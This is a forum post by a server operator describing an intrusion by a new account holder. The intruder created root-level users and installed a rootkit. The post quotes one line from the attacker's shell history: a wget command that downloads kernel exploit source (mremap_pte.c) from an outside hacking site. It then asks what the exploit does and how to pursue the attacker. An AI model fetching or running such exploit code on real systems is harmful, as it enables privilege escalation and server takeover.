I Caught A Hacker - how do I hammer this guy?
I had a recent signup and our Fraud protection gave a blank result for all aspects it checks - basically the IP was unknown. So I decided to allow the account to be created - BIG MISTAKE.
The next few hours the server was hacked. I managed to lock him out again - terminated his account, removed all his (0) UID created users and groups etc. I totally diabled telnet and changed ssh settings. So I'm feel farily confident I locked him out now. anyway I wanted to know exactly what he did so I did a search for all the .bash_history files - his came up I had a look at it:
he went straight into uploading an exploiter (root kit) and installed it and bang erased everything in his account and that was it. Now I'm wondering - has he set the server up for something bad in the coming days - anyway it doesn't matter I'm having the server cancelled in a days time, setting up a new server now.
But here's what he uploaded via ftp:
wget http://www.web-hack.ru/exploit/source/mremap_pte.c
He then compiled it and the servers been stuffed ever since. Question - is this a kernal crack - meaning a serious one? Anyone had experience with this before.
Anyway I have all his details - although they are prob all false - but I have his IP and the username he signed up with was smurfas
Anyone got any suggestions how I deal with this from now? I'd love to get this guy caught - do I have enough info?
Also should I be doing anything else to server right now? What's this mremap_pte.c do?
Help much appreciated
